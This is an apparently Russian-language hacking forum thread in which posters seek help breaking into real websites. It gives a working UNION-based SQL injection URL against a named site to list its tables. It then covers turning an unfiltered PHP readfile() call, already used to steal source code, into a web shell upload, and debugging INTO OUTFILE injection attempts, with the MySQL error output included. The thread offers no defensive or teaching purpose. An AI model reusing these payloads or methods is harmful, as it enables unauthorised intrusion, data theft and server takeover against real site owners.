Тренировка и практика еще никому не мешали

тренируйся на кошках (с)

Но если не трудно можете показать на примере вот здесь список таблиц

http://www.stromgren.com/products.php?id=22+and+1=0+union+select+group_conc at(table_name+separator+0x3a)+from+information_sch ema.tables+where+table_schema=0x73776173696e676572--

А меня склоняло к мысли о TRUNCATE

Есть скрипт с отсутствием фильтрации в вызове функции readfile. С помощью этой уязвимости утянул исходники, но больше в них зацепиться не за что: нет инъекций, нет упоминаний админки (да и я не уверен, что она вообще существует), нет L/RFI, XSS, аворизации, системы прав, заливки файлов. Вообще ничего интересного кроме readfile. Можно ли вытянуть из этого что-то полезное?

Интересует заливка шелла.

Директивы open_basedir нет, однако (видимо из-за прав) получить файл httpd.conf не получилось.

Сайт лежит на VPS. Сайтов на сервере несколько, однако к одному IP привязан только один домен, так что через поиск сайтов по IP ничего узнать не вышло. Удалось установить наличие ещё одного сайта со своим собственным IP, однако и в его исходниках нет ничего интересного.

Есть доступ к phpinfo и некоторым файлам конфигурации.

Что можете подсказать?

Ты линк выложи, а мы посмотрим.

Как-нибудь в другой раз. Здесь смотреть особо не на что, всю доступную инфу я озвучил, интересует направления, в которых думать дальше.

delete

Подскажите любой рабочий способ узнать путь к файлу?

в чем тут ошибка?

?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e 747874 --

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1

?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' --

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'/tmp/lol.txt -- ORDER BY rel_id DESC LIMIT 5' at line 1